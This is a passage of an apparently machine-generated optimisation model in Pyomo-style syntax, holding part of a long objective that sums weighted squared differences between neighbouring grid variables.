8.11690209768664*m.x925)**2 + (1.3*m.x924 - 1.3*m.x925)**2) + 3.37452161263043*((8.11690209768664
*m.x899 - 8.11690209768664*m.x926)**2 + (1.3*m.x925 - 1.3*m.x926)**2) + 3.37452161263043*((
8.11690209768664*m.x900 - 8.11690209768664*m.x927)**2 + (1.3*m.x926 - 1.3*m.x927)**2) +
3.37452161263043*((8.11690209768664*m.x901 - 8.11690209768664*m.x928)**2 + (1.3*m.x927 - 1.3*
m.x928)**2) + 3.37452161263043*((8.11690209768664*m.x902 - 8.11690209768664*m.x929)**2 + (1.3*
m.x928 - 1.3*m.x929)**2) + 3.37452161263043*((8.11690209768664*m.x903 - 8.11690209768664*m.x930)
**2 + (1.3*m.x929 - 1.3*m.x930)**2) + 3.37452161263043*((8.11690209768664*m.x904 -
8.11690209768664*m.x931)**2 + (1.3*m.x930 - 1.3*m.x931)**2) + 3.37452161263043*((8.11690209768664
*m.x905 - 8.11690209768664*m.x932)**2 + (1.3*m.x931 - 1.3*m.x932)**2) + 3.37452161263043*((
8.11690209768664*m.x906 - 8.11690209768664*m.x933)**2 + (1.3*m.x932 - 1.3*m.x933)**2) +
3.37452161263043*((8.11690209768664*m.x907 - 8.11690209768664*m.x934)**2 + (1.3*m.x933 - 1.3*
m.x934)**2) + 3.37452161263043*((8.11690209768664*m.x908 - 8.11690209768664*m.x935)**2 + (1.3*
m.x934 - 1.3*m.x935)**2) + 3.37452161263043*((8.11690209768664*m.x909 - 8.11690209768664*m.x936)
**2 + (1.3*m.x935 - 1.3*m.x936)**2) + 3.37452161263043*((8.11690209768664*m.x910 -
8.11690209768664*m.x937)**2 + (1.3*m.x936 - 1.3*m.x937)**2) + 3.37452161263043*((8.11690209768664
*m.x911 - 8.11690209768664*m.x938)**2 + (1.3*m.x937 - 1.3*m.x938)**2) + 3.37452161263043*((
8.11690209768664*m.x912 - 8.11690209768664*m.x939)**2 + (1.3*m.x938 - 1.3*m.x939)**2) +
3.37452161263043*((8.11690209768664*m.x913 - 8.11690209768664*m.x940)**2 + (1.3*m.x939 - 1.3*
m.x940)**2) + 3.37452161263043*((8.11690209768664*m.x914 - 8.11690209768664*m.x941)**2 + (1.3*
m.x940 - 1.3*m.x941)**2) + 3.37452161263043*((8.11690209768664*m.x915 - 8.11690209768664*m.x942)
**2 + (1.3*m.x941 - 1.3*m.x942)**2) + 3.37452161263043*((8.11690209768664*m.x916 -
8.11690209768664*m.x943)**2 + (1.3*m.x942 - 1.3*m.x943)**2) + 3.37452161263043*((8.11690209768664
*m.x917 - 8.11690209768664*m.x944)**2 + (1.3*m.x943 - 1.3*m.x944)**2) + 3.37452161263043*((
8.11690209768664*m.x918 - 8.11690209768664*m.x945)**2 + (1.3*m.x944 - 1.3*m.x945)**2) +
3.48987601495028*((8.11690209768664*m.x920 - 8.11690209768664*m.x947)**2 + (1.3*m.x946 - 1.3*
m.x947)**2) + 3.48987601495028*((8.11690209768664*m.x921 - 8.11690209768664*m.x948)**2 + (1.3*
m.x947 - 1.3*m.x948)**2) + 3.48987601495028*((8.11690209768664*m.x922 - 8.11690209768664*m.x949)
**2 + (1.3*m.x948 - 1.3*m.x949)**2) + 3.48987601495028*((8.11690209768664*m.x923 -
8.11690209768664*m.x950)**2 + (1.3*m.x949 - 1.3*m.x950)**2) + 3.48987601495028*((8.11690209768664
*m.x924 - 8.11690209768664*m.x951)**2 + (1.3*m.x950 - 1.3*m.x951)**2) + 3.48987601495028*((
8.11690209768664*m.x925 - 8.11690209768664*m.x952)**2 + (1.3*m.x951 - 1.3*m.x952)**2) +
3.48987601495028*((8.11690209768664*m.x926 - 8.11690209768664*m.x953)**2 + (1.3*m.x952 - 1.3*
m.x953)**2) + 3.48987601495028*((8.11690209768664*m.x927 - 8.11690209768664*m.x954)**2 + (1.3*
m.x953 - 1.3*m.x954)**2) + 3.48987601495028*((8.11690209768664*m.x928 - 8.11690209768664*m.x955)
**2 + (1.3*m.x954 - 1.3*m.x955)**2) + 3.48987601495028*((8.11690209768664*m.x929 -
8.11690209768664*m.x956)**2 + (1.3*m.x955 - 1.3*m.x956)**2) + 3.48987601495028*((8.11690209768664
*m.x930 - 8.11690209768664*m.x957)**2 + (1.3*m.x956 - 1.3*m.x957)**2) + 3.48987601495028*((
8.11690209768664*m.x931 - 8.11690209768664*m.x958)**2 + (1.3*m.x957 - 1.3*m.x958)**2) +
3.48987601495028*((8.11690209768664*m.x932 - 8.11690209768664*m.x959)**2 + (1.3*m.x958 - 1.3*
m.x959)**2) + 3.48987601495028*((8.11690209768664*m.x933 - 8.11690209768664*m.x960)**2 + (1.3*
m.x959 - 1.3*m.x960)**2) + 3.48987601495028*((8.11690209768664*m.x934 - 8.11690209768664*m.x961)
**2 + (1.3*m.x960 - 1.3*m.x961)**2) + 3.48987601495028*((8.11690209768664*m.x935 -
8.11690209768664*m.x962)**2 + (1.3*m.x961 - 1.3*m.x962)**2) + 3.48987601495028*((8.11690209768664
*m.x936 - 8.11690209768664*m.x963)**2 + (1.3*m.x962 - 1.3*m.x963)**2) + 3.48987601495028*((
8.11690209768664*m.x937 - 8.11690209768664*m.x964)**2 + (1.3*m.x963 - 1.3*m.x964)**2) +
3.48987601495028*((8.11690209768664*m.x938 - 8.11690209768664*m.x965)**2 + (1.3*m.x964 - 1.3*
m.x965)**2) + 3.48987601495028*((8.11690209768664*m.x939 - 8.11690209768664*m.x966)**2 + (1.3*
m.x965 - 1.3*m.x966)**2) + 3.48987601495028*((8.11690209768664*m.x940 - 8.11690209768664*m.x967)
**2 + (1.3*m.x966 - 1.3*m.x967)**2) + 3.48987601495028*((8.11690209768664*m.x941 -
8.11690209768664*m.x968)**2 + (1.3*m.x967 - 1.3*m.x968)**2) + 3.48987601495028*((8.11690209768664
*m.x942 - 8.11690209768664*m.x969)**2 + (1.3*m.x968 - 1.3*m.x969)**2) + 3.48987601495028*((
8.11690209768664*m.x943 - 8.11690209768664*m.x970)**2 + (1.3*m.x969 - 1.3*m.x970)**2) +
3.48987601495028*((8.11690209768664*m.x944 - 8.11690209768664*m.x971)**2 + (1.3*m.x970 - 1.3*
m.x971)**2) + 3.48987601495028*((8.11690209768664*m.x945 - 8.11690209768664*m.x972)**2 + (1.3*
m.x971 - 1.3*m.x972)**2) + 3.61538071680864*((8.11690209768664*m.x947 - 8.11690209768664*m.x974)
**2 + (1.3*m.x973 - 1.3*m.x974)**2) + 3.61538071680864*((8.11690209768664*m.x948 -
8.11690209768664*m.x975)**2 + (1.3*m.x974 - 1.3*m.x975)**2) + 3.61538071680864*((8.11690209768664
*m.x949 - 8.11690209768664*m.x976)**2 + (1.3*m.x975 - 1.3*m.x976)**2) + 3.61538071680864*((
8.11690209768664*m.x950 - 8.11690209768664*m.x977)**2 + (1.3*m.x976 - 1.3*m.x977)**2) +
3.61538071680864*((8.11690209768664*m.x951 - 8.11690209768664*m.x978)**2 + (1.3*m.x977 - 1.3*
m.x978)**2) + 3.61538071680864*((8.11690209768664*m.x952 - 8.11690209768664*m.x979)**2 + (1.3*
m.x978 - 1.3*m.x979)**2) + 3.61538071680864*((8.11690209768664*m.x953 - 8.11690209768664*m.x980)
**2 + (1.3*m.x979 - 1.3*m.x980)**2) + 3.61538071680864*((8.11690209768664*m.x954 -
8.11690209768664*m.x981)**2 + (1.3*m.x980 - 1.3*m.x981)**2) + 3.61538071680864*((8.11690209768664
*m.x955 - 8.11690209768664*m.x982)**2 + (1.3*m.x981 - 1.3*m.x982)**2) + 3.61538071680864*((
8.11690209768664*m.x956 - 8.11690209768664*m.x983)**2 + (1.3*m.x982 - 1.3*m.x983)**2) +
3.61538071680864*((8.11690209768664*m.x957 - 8.11690209768664*m.x984)**2 + (1.3*m.x983 - 1.3*
m.x984)**2) + 3.61538071680864*((8.11690209768664*m.x958 - 8.11690209768664*m.x985)**2 + (1.3*
m.x984 - 1.3*m.x985)**2) + 3.61538071680864*((8.11690209768664*m.x959 - 8.11690209768664*m.x986)
**2 + (1.3*m.x985 - 1.3*m.x986)**2) + 3.61538071680864*((8.11690209768664*m.x960 -
8.11690209768664*m.x987)**2 + (1.3*m.x986 - 1.3*m.x987)**2) + 3.61538071680864*((8.11690209768664
*m.x961 - 8.11690209768664*m.x988)**2 + (1.3*m.x987 - 1.3*m.x988)**2) + 3.61538071680864*((
8.11690209768664*m.x962 - 8.11690209768664*m.x989)**2 + (1.3*m.x988 - 1.3*m.x989)**2) +
3.61538071680864*((8.11690209768664*m.x963 - 8.11690209768664*m.x990)**2 + (1.3*m.x989 - 1.3*
m.x990)**2) + 3.61538071680864*((8.11690209768664*m.x964 - 8.11690209768664*m.x991)**2 + (1.3*
m.x990 - 1.3*m.x991)**2) + 3.61538071680864*((8.11690209768664*m.x965 - 8.11690209768664*m.x992)
**2 + (1.3*m.x991 - 1.3*m.x992)**2) + 3.61538071680864*((8.11690209768664*m.x966 -
8.11690209768664*m.x993)**2 + (1.3*m.x992 - 1.3*m.x993)**2) + 3.61538071680864*((8.11690209768664
*m.x967 - 8.11690209768664*m.x994)**2 + (1.3*m.x993 - 1.3*m.x994)**2) + 3.61538071680864*((
8.11690209768664*m.x968 - 8.11690209768664*m.x995)**2 + (1.3*m.x994 - 1.3*m.x995)**2) +
3.61538071680864*((8.11690209768664*m.x969 - 8.11690209768664*m.x996)**2 + (1.3*m.x995 - 1.3*
m.x996)**2) + 3.61538071680864*((8.11690209768664*m.x970 - 8.11690209768664*m.x997)**2 + (1.3*
m.x996 - 1.3*m.x997)**2) + 3.61538071680864*((8.11690209768664*m.x971 - 8.11690209768664*m.x998)
**2 + (1.3*m.x997 - 1.3*m.x998)**2) + 3.61538071680864*((8.11690209768664*m.x972 -
8.11690209768664*m.x999)**2 + (1.3*m.x998 - 1.3*m.x999)**2) + 3.74962423061392*((8.11690209768664
*m.x974 - 8.11690209768664*m.x1001)**2 + (1.3*m.x1000 - 1.3*m.x1001)**2) + 3.74962423061392*((
8.11690209768664*m.x975 - 8.11690209768664*m.x1002)**2 + (1.3*m.x1001 - 1.3*m.x1002)**2) +
3.74962423061392*((8.11690209768664*m.x976 - 8.11690209768664*m.x1003)**2 + (1.3*m.x1002 - 1.3*
m.x1003)**2) + 3.74962423061392*((8.11690209768664*m.x977 - 8.11690209768664*m.x1004)**2 + (1.3*
m.x1003 - 1.3*m.x1004)**2) + 3.74962423061392*((8.11690209768664*m.x978 - 8.11690209768664*
m.x1005)**2 + (1.3*m.x1004 - 1.3*m.x1005)**2) + 3.74962423061392*((8.11690209768664*m.x979 -
8.11690209768664*m.x1006)**2 + (1.3*m.x1005 - 1.3*m.x1006)**2) + 3.74962423061392*((
8.11690209768664*m.x980 - 8.11690209768664*m.x1007)**2 + (1.3*m.x1006 - 1.3*m.x1007)**2) +
3.74962423061392*((8.11690209768664*m.x981 - 8.11690209768664*m.x1008)**2 + (1.3*m.x1007 - 1.3*
m.x1008)**2) + 3.74962423061392*((8.11690209768664*m.x982 - 8.11690209768664*m.x1009)**2 + (1.3*
m.x1008 - 1.3*m.x1009)**2) + 3.74962423061392*((8.11690209768664*m.x983 - 8.11690209768664*
m.x1010)**2 + (1.3*m.x1009 - 1.3*m.x1010)**2) + 3.74962423061392*((8.11690209768664*m.x984 -
8.11690209768664*m.x1011)**2 + (1.3*m.x1010 - 1.3*m.x1011)**2) + 3.74962423061392*((
8.11690209768664*m.x985 - 8.11690209768664*m.x1012)**2 + (1.3*m.x1011 - 1.3*m.x1012)**2) +
3.74962423061392*((8.11690209768664*m.x986 - 8.11690209768664*m.x1013)**2 + (1.3*m.x1012 - 1.3*
m.x1013)**2) + 3.74962423061392*((8.11690209768664*m.x987 - 8.11690209768664*m.x1014)**2 + (1.3*
m.x1013 - 1.3*m.x1014)**2) + 3.74962423061392*((8.11690209768664*m.x988 - 8.11690209768664*
m.x1015)**2 + (1.3*m.x1014 - 1.3*m.x1015)**2) + 3.74962423061392*((8.11690209768664*m.x989 -
8.11690209768664*m.x1016)**2 + (1.3*m.x1015 - 1.3*m.x1016)**2) + 3.74962423061392*((
8.11690209768664*m.x990 - 8.11690209768664*m.x1017)**2 + (1.3*m.x1016 - 1.3*m.x1017)**2) +
3.74962423061392*((8.11690209768664*m.x991 - 8.11690209768664*m.x1018)**2 + (1.3*m.x1017 - 1.3*
m.x1018)**2) + 3.74962423061392*((8.11690209768664*m.x992 - 8.11690209768664*m.x1019)**2 + (1.3*
m.x1018 - 1.3*m.x1019)**2) + 3.74962423061392*((8.11690209768664*m.x993 - 8.11690209768664*
m.x1020)**2 + (1.3*m.x1019 - 1.3*m.x1020)**2) + 3.74962423061392*((8.11690209768664*m.x994 -
8.11690209768664*m.x1021)**2 + (1.3*m.x1020 - 1.3*m.x1021)**2) + 3.74962423061392*((
8.11690209768664*m.x995 - 8.11690209768664*m.x1022)**2 + (1.3*m.x1021 - 1.3*m.x1022)**2) +
3.74962423061392*((8.11690209768664*m.x996 - 8.11690209768664*m.x1023)**2 + (1.3*m.x1022 - 1.3*
m.x1023)**2) + 3.74962423061392*((8.11690209768664*m.x997 - 8.11690209768664*m.x1024)**2 + (1.3*
m.x1023 - 1.3*m.x1024)**2) + 3.74962423061392*((8.11690209768664*m.x998 - 8.11690209768664*
m.x1025)**2 + (1.3*m.x1024 - 1.3*m.x1025)**2) + 3.74962423061392*((8.11690209768664*m.x999 -
8.11690209768664*m.x1026)**2 + (1.3*m.x1025 - 1.3*m.x1026)**2) + 3.89094933535164*((
8.11690209768664*m.x1001 - 8.11690209768664*m.x1028)**2 + (1.3*m.x1027 - 1.3*m.x1028)**2) +
3.89094933535164*((8.11690209768664*m.x1002 - 8.11690209768664*m.x1029)**2 + (1.3*m.x1028 - 1.3*
m.x1029)**2) + 3.89094933535164*((8.11690209768664*m.x1003 - 8.11690209768664*m.x1030)**2 + (1.3*
m.x1029 - 1.3*m.x1030)**2) + 3.89094933535164*((8.11690209768664*m.x1004 - 8.11690209768664*
m.x1031)**2 + (1.3*m.x1030 - 1.3*m.x1031)**2) + 3.89094933535164*((8.11690209768664*m.x1005 -
8.11690209768664*m.x1032)**2 + (1.3*m.x1031 - 1.3*m.x1032)**2) + 3.89094933535164*((
8.11690209768664*m.x1006 - 8.11690209768664*m.x1033)**2 + (1.3*m.x1032 - 1.3*m.x1033)**2) +
3.89094933535164*((8.11690209768664*m.x1007 - 8.11690209768664*m.x1034)**2 + (1.3*m.x1033 - 1.3*
m.x1034)**2) + 3.89094933535164*((8.11690209768664*m.x1008 - 8.11690209768664*m.x1035)**2 + (1.3*
m.x1034 - 1.3*m.x1035)**2) + 3.89094933535164*((8.11690209768664*m.x1009 - 8.11690209768664*
m.x1036)**2 + (1.3*m.x1035 - 1.3*m.x1036)**2) + 3.89094933535164*((8.11690209768664*m.x1010 -
8.11690209768664*m.x1037)**2 + (1.3*m.x1036 - 1.3*m.x1037)**2) + 3.89094933535164*((
8.11690209768664*m.x1011 - 8.11690209768664*m.x1038)**2 + (1.3*m.x1037 - 1.3*m.x1038)**2) +
3.89094933535164*((8.11690209768664*m.x1012 - 8.11690209768664*m.x1039)**2 + (1.3*m.x1038 - 1.3*
m.x1039)**2) + 3.89094933535164*((8.11690209768664*m.x1013 - 8.11690209768664*m.x1040)**2 + (1.3*
m.x1039 - 1.3*m.x1040)**2) + 3.89094933535164*((8.11690209768664*m.x1014 - 8.11690209768664*
m.x1041)**2 + (1.3*m.x1040 - 1.3*m.x1041)**2) + 3.89094933535164*((8.11690209768664*m.x1015 -
8.11690209768664*m.x1042)**2 + (1.3*m.x1041 - 1.3*m.x1042)**2) + 3.89094933535164*((
8.11690209768664*m.x1016 - 8.11690209768664*m.x1043)**2 + (1.3*m.x1042 - 1.3*m.x1043)**2) +
3.89094933535164*((8.11690209768664*m.x1017 - 8.11690209768664*m.x1044)**2 + (1.3*m.x1043 - 1.3*
m.x1044)**2) + 3.89094933535164*((8.11690209768664*m.x1018 - 8.11690209768664*m.x1045)**2 + (1.3*
m.x1044 - 1.3*m.x1045)**2) + 3.89094933535164*((8.11690209768664*m.x1019 - 8.11690209768664*
m.x1046)**2 + (1.3*m.x1045 - 1.3*m.x1046)**2) + 3.89094933535164*((8.11690209768664*m.x1020 -
8.11690209768664*m.x1047)**2 + (1.3*m.x1046 - 1.3*m.x1047)**2) + 3.89094933535164*((
8.11690209768664*m.x1021 - 8.11690209768664*m.x1048)**2 + (1.3*m.x1047 - 1.3*m.x1048)**2) +
3.89094933535164*((8.11690209768664*m.x1022 - 8.11690209768664*m.x1049)**2 + (1.3*m.x1048 - 1.3*
m.x1049)**2) + 3.89094933535164*((8.11690209768664*m.x1023 - 8.11690209768664*m.x1050)**2 + (1.3*
m.x1049 - 1.3*m.x1050)**2) + 3.89094933535164*((8.11690209768664*m.x1024 - 8.11690209768664*
m.x1051)**2 + (1.3*m.x1050 - 1.3*m.x1051)**2) + 3.89094933535164*((8.11690209768664*m.x1025 -
8.11690209768664*m.x1052)**2 + (1.3*m.x1051 - 1.3*m.x1052)**2) + 3.89094933535164*((
8.11690209768664*m.x1026 - 8.11690209768664*m.x1053)**2 + (1.3*m.x1052 - 1.3*m.x1053)**2) +
4.03745320032772*((8.11690209768664*m.x1028 - 8.11690209768664*m.x1055)**2 + (1.3*m.x1054 - 1.3*
m.x1055)**2) + 4.03745320032772*((8.11690209768664*m.x1029 - 8.11690209768664*m.x1056)**2 + (1.3*
m.x1055 - 1.3*m.x1056)**2) + 4.03745320032772*((8.11690209768664*m.x1030 - 8.11690209768664*
m.x1057)**2 + (1.3*m.x1056 - 1.3*m.x1057)**2) + 4.03745320032772*((8.11690209768664*m.x1031 -
8.11690209768664*m.x1058)**2 + (1.3*m.x1057 - 1.3*m.x1058)**2) + 4.03745320032772*((
8.11690209768664*m.x1032 - 8.11690209768664*m.x1059)**2 + (1.3*m.x1058 - 1.3*m.x1059)**2) +
4.03745320032772*((8.11690209768664*m.x1033 - 8.11690209768664*m.x1060)**2 + (1.3*m.x1059 - 1.3*
m.x1060)**2) + 4.03745320032772*((8.11690209768664*m.x1034 - 8.11690209768664*m.x1061)**2 + (1.3*
m.x1060 - 1.3*m.x1061)**2) + 4.03745320032772*((8.11690209768664*m.x1035 - 8.11690209768664*
m.x1062)**2 + (1.3*m.x1061 - 1.3*m.x1062)**2) + 4.03745320032772*((8.11690209768664*m.x1036 -
8.11690209768664*m.x1063)**2 + (1.3*m.x1062 - 1.3*m.x1063)**2) + 4.03745320032772*((
8.11690209768664*m.x1037 - 8.11690209768664*m.x1064)**2 + (1.3*m.x1063 - 1.3*m.x1064)**2) +
4.03745320032772*((8.11690209768664*m.x1038 - 8.11690209768664*m.x1065)**2 + (1.3*m.x1064 - 1.3*
m.x1065)**2) + 4.03745320032772*((8.11690209768664*m.x1039 - 8.11690209768664*m.x1066)**2 + (1.3*
m.x1065 - 1.3*m.x1066)**2) + 4.03745320032772*((8.11690209768664*m.x1040 - 8.11690209768664*
m.x1067)**2 + (1.3*m.x1066 - 1.3*m.x1067)**2) + 4.03745320032772*((8.11690209768664*m.x1041 -
8.11690209768664*m.x1068)**2 + (1.3*m.x1067 - 1.3*m.x1068)**2) + 4.03745320032772*((
8.11690209768664*m.x1042 - 8.11690209768664*m.x1069)**2 + (1.3*m.x1068 - 1.3*m.x1069)**2) +
4.03745320032772*((8.11690209768664*m.x1043 - 8.11690209768664*m.x1070)**2 + (1.3*m.x1069 - 1.3*
m.x1070)**2) + 4.03745320032772*((8.11690209768664*m.x1044 - 8.11690209768664*m.x1071)**2 + (1.3*
m.x1070 - 1.3*m.x1071)**2) + 4.03745320032772*((8.11690209768664*m.x1045 - 8.11690209768664*
m.x1072)**2 + (1.3*m.x1071 - 1.3*m.x1072)**2) + 4.03745320032772*((8.11690209768664*m.x1046 -
8.11690209768664*m.x1073)**2 + (1.3*m.x1072 - 1.3*m.x1073)**2) + 4.03745320032772*((
8.11690209768664*m.x1047 - 8.11690209768664*m.x1074)**2 + (1.3*m.x1073 - 1.3*m.x1074)**2) +
4.03745320032772*((8.11690209768664*m.x1048 - 8.11690209768664*m.x1075)**2 + (1.3*m.x1074 - 1.3*
m.x1075)**2) + 4.03745320032772*((8.11690209768664*m.x1049 - 8.11690209768664*m.x1076)**2 + (1.3*
m.x1075 - 1.3*m.x1076)**2) + 4.03745320032772*((8.11690209768664*m.x1050 - 8.11690209768664*
m.x1077)**2 + (1.3*m.x1076 - 1.3*m.x1077)**2) + 4.03745320032772*((8.11690209768664*m.x1051 -
8.11690209768664*m.x1078)**2 + (1.3*m.x1077 - 1.3*m.x1078)**2) + 4.03745320032772*((
8.11690209768664*m.x1052 - 8.11690209768664*m.x1079)**2 + (1.3*m.x1078 - 1.3*m.x1079)**2) +
4.03745320032772*((8.11690209768664*m.x1053 - 8.11690209768664*m.x1080)**2 + (1.3*m.x1079 - 1.3*
m.x1080)**2) + 4.18699886780757*((8.11690209768664*m.x1055 - 8.11690209768664*m.x1082)**2 + (1.3*
m.x1081 - 1.3*m.x1082)**2) + 4.18699886780757*((8.11690209768664*m.x1056 - 8.11690209768664*
m.x1083)**2 + (1.3*m.x1082 - 1.3*m.x1083)**2) + 4.18699886780757*((8.11690209768664*m.x1057 -
8.11690209768664*m.x1084)**2 + (1.3*m.x1083 - 1.3*m.x1084)**2) + 4.18699886780757*((
8.11690209768664*m.x1058 - 8.11690209768664*m.x1085)**2 + (1.3*m.x1084 - 1.3*m.x1085)**2) +
4.18699886780757*((8.11690209768664*m.x1059 - 8.11690209768664*m.x1086)**2 + (1.3*m.x1085 - 1.3*
m.x1086)**2) + 4.18699886780757*((8.11690209768664*m.x1060 - 8.11690209768664*m.x1087)**2 + (1.3*
m.x1086 - 1.3*m.x1087)**2) + 4.18699886780757*((8.11690209768664*m.x1061 - 8.11690209768664*
m.x1088)**2 + (1.3*m.x1087 - 1.3*m.x1088)**2) + 4.18699886780757*((8.11690209768664*m.x1062 -
8.11690209768664*m.x1089)**2 + (1.3*m.x1088 - 1.3*m.x1089)**2) + 4.18699886780757*((
8.11690209768664*m.x1063 - 8.11690209768664*m.x1090)**2 + (1.3*m.x1089 - 1.3*m.x1090)**2) +
4.18699886780757*((8.11690209768664*m.x1064 - 8.11690209768664*m.x1091)**2 + (1.3*m.x1090 - 1.3*
m.x1091)**2) + 4.18699886780757*((8.11690209768664*m.x1065 - 8.11690209768664*m.x1092)**2 + (1.3*
m.x1091 - 1.3*m.x1092)**2) + 4.18699886780757*((8.11690209768664*m.x1066 - 8.11690209768664*
m.x1093)**2 + (1.3*m.x1092 - 1.3*m.x1093)**2) + 4.18699886780757*((8.11690209768664*m.x1067 -
8.11690209768664*m.x1094)**2 + (1.3*m.x1093 - 1.3*m.x1094)**2) + 4.18699886780757*((
8.11690209768664*m.x1068 - 8.11690209768664*m.x1095)**2 + (1.3*m.x1094 - 1.3*m.x1095)**2) +
4.18699886780757*((8.11690209768664*m.x1069 - 8.11690209768664*m.x1096)**2 + (1.3*m.x1095 - 1.3*
m.x1096)**2) + 4.18699886780757*((8.11690209768664*m.x1070 - 8.11690209768664*m.x1097)**2 + (1.3*
m.x1096 - 1.3*m.x1097)**2) + 4.18699886780757*((8.11690209768664*m.x1071 - 8.11690209768664*
m.x1098)**2 + (1.3*m.x1097 - 1.3*m.x1098)**2) + 4.18699886780757*((8.11690209768664*m.x1072 -
8.11690209768664*m.x1099)**2 + (1.3*m.x1098 - 1.3*m.x1099)**2) + 4.18699886780757*((
8.11690209768664*m.x1073 - 8.11690209768664*m.x1100)**2 + (1.3*m.x1099 - 1.3*m.x1100)**2) +
4.18699886780757*((8.11690209768664*m.x1074 - 8.11690209768664*m.x1101)**2 + (1.3*m.x1100 - 1.3*
m.x1101)**2) + 4.18699886780757*((8.11690209768664*m.x1075 - 8.11690209768664*m.x1102)**2 + (1.3*
m.x1101 - 1.3*m.x1102)**2) + 4.18699886780757*((8.11690209768664*m.x1076 - 8.11690209768664*
m.x1103)**2 + (1.3*m.x1102 - 1.3*m.x1103)**2) + 4.18699886780757*((8.11690209768664*m.x1077 -
8.11690209768664*m.x1104)**2 + (1.3*m.x1103 - 1.3*m.x1104)**2) + 4.18699886780757*((
8.11690209768664*m.x1078 - 8.11690209768664*m.x1105)**2 + (1.3*m.x1104 - 1.3*m.x1105)**2) +
4.18699886780757*((8.11690209768664*m.x1079 - 8.11690209768664*m.x1106)**2 + (1.3*m.x1105 - 1.3*
m.x1106)**2) + 4.18699886780757*((8.11690209768664*m.x1080 - 8.11690209768664*m.x1107)**2 + (1.3*
m.x1106 - 1.3*m.x1107)**2) + 4.33723936015933*((8.11690209768664*m.x1082 - 8.11690209768664*
m.x1109)**2 + (1.3*m.x1108 - 1.3*m.x1109)**2) + 4.33723936015933*((8.11690209768664*m.x1083 -
8.11690209768664*m.x1110)**2 + (1.3*m.x1109 - 1.3*m.x1110)**2) + 4.33723936015933*((
8.11690209768664*m.x1084 - 8.11690209768664*m.x1111)**2 + (1.3*m.x1110 - 1.3*m.x1111)**2) +
4.33723936015933*((8.11690209768664*m.x1085 - 8.11690209768664*m.x1112)**2 + (1.3*m.x1111 - 1.3*
m.x1112)**2) + 4.33723936015933*((8.11690209768664*m.x1086 - 8.11690209768664*m.x1113)**2 + (1.3*
m.x1112 - 1.3*m.x1113)**2) + 4.33723936015933*((8.11690209768664*m.x1087 - 8.11690209768664*
m.x1114)**2 + (1.3*m.x1113 - 1.3*m.x1114)**2) + 4.33723936015933*((8.11690209768664*m.x1088 -
8.11690209768664*m.x1115)**2 + (1.3*m.x1114 - 1.3*m.x1115)**2) + 4.33723936015933*((
8.11690209768664*m.x1089 - 8.11690209768664*m.x1116)**2 + (1.3*m.x1115 - 1.3*m.x1116)**2) +
4.33723936015933*((8.11690209768664*m.x1090 - 8.11690209768664*m.x1117)**2 + (1.3*m.x1116 - 1.3*
m.x1117)**2) + 4.33723936015933*((8.11690209768664*m.x1091 - 8.11690209768664*m.x1118)**2 + (1.3*
m.x1117 - 1.3*m.x1118)**2) + 4.33723936015933*((8.11690209768664*m.x1092 - 8.11690209768664*
m.x1119)**2 + (1.3*m.x1118 - 1.3*m.x1119)**2) + 4.33723936015933*((8.11690209768664*m.x1093 -
8.11690209768664*m.x1120)**2 + (1.3*m.x1119 - 1.3*m.x1120)**2) + 4.33723936015933*((
8.11690209768664*m.x1094 - 8.11690209768664*m.x1121)**2 + (1.3*m.x1120 - 1.3*m.x1121)**2) +
4.33723936015933*((8.11690209768664*m.x1095 - 8.11690209768664*m.x1122)**2 + (1.3*m.x1121 - 1.3*
m.x1122)**2) + 4.33723936015933*((8.11690209768664*m.x1096 - 8.11690209768664*m.x1123)**2 + (1.3*
m.x1122 - 1.3*m.x1123)**2) + 4.33723936015933*((8.11690209768664*m.x1097 - 8.11690209768664*
m.x1124)**2 + (1.3*m.x1123 - 1.3*m.x1124)**2) + 4.33723936015933*((8.11690209768664*m.x1098 -
8.11690209768664*m.x1125)**2 + (1.3*m.x1124 - 1.3*m.x1125)**2) + 4.33723936015933*((
8.11690209768664*m.x1099 - 8.11690209768664*m.x1126)**2 + (1.3*m.x1125 - 1.3*m.x1126)**2) +
4.33723936015933*((8.11690209768664*m.x1100 - 8.11690209768664*m.x1127)**2 + (1.3*m.x1126 - 1.3*
m.x1127)**2) + 4.33723936015933*((8.11690209768664*m.x1101 - 8.11690209768664*m.x1128)**2 + (1.3*
m.x1127 - 1.3*m.x1128)**2) + 4.33723936015933*((8.11690209768664*m.x1102 - 8.11690209768664*
m.x1129)**2 + (1.3*m.x1128 - 1.3*m.x1129)**2) + 4.33723936015933*((8.11690209768664*m.x1103 -
8.11690209768664*m.x1130)**2 + (1.3*m.x1129 - 1.3*m.x1130)**2) + 4.33723936015933*((
8.11690209768664*m.x1104 - 8.11690209768664*m.x1131)**2 + (1.3*m.x1130 - 1.3*m.x1131)**2) +
4.33723936015933*((8.11690209768664*m.x1105 - 8.11690209768664*m.x1132)**2 + (1.3*m.x1131 - 1.3*
m.x1132)**2) + 4.33723936015933*((8.11690209768664*m.x1106 - 8.11690209768664*m.x1133)**2 + (1.3*
m.x1132 - 1.3*m.x1133)**2) + 4.33723936015933*((8.11690209768664*m.x1107 - 8.11690209768664*
m.x1134)**2 + (1.3*m.x1133 - 1.3*m.x1134)**2) + 4.48565498144176*((8.11690209768664*m.x1109 -
8.11690209768664*m.x1136)**2 + (1.3*m.x1135 - 1.3*m.x1136)**2) + 4.48565498144176*((
8.11690209768664*m.x1110 - 8.11690209768664*m.x1137)**2 + (1.3*m.x1136 - 1.3*m.x1137)**2) +
4.48565498144176*((8.11690209768664*m.x1111 - 8.11690209768664*m.x1138)**2 + (1.3*m.x1137 - 1.3*
m.x1138)**2) + 4.48565498144176*((8.11690209768664*m.x1112 - 8.11690209768664*m.x1139)**2 + (1.3*
m.x1138 - 1.3*m.x1139)**2) + 4.48565498144176*((8.11690209768664*m.x1113 - 8.11690209768664*
m.x1140)**2 + (1.3*m.x1139 - 1.3*m.x1140)**2) + 4.48565498144176*((8.11690209768664*m.x1114 -
8.11690209768664*m.x1141)**2 + (1.3*m.x1140 - 1.3*m.x1141)**2) + 4.48565498144176*((
8.11690209768664*m.x1115 - 8.11690209768664*m.x1142)**2 + (1.3*m.x1141 - 1.3*m.x1142)**2) +
4.48565498144176*((8.11690209768664*m.x1116 - 8.11690209768664*m.x1143)**2 + (1.3*m.x1142 - 1.3*
m.x1143)**2) + 4.48565498144176*((8.11690209768664*m.x1117 - 8.11690209768664*m.x1144)**2 + (1.3*
m.x1143 - 1.3*m.x1144)**2) + 4.48565498144176*((8.11690209768664*m.x1118 - 8.11690209768664*
m.x1145)**2 + (1.3*m.x1144 - 1.3*m.x1145)**2) + 4.48565498144176*((8.11690209768664*m.x1119 -
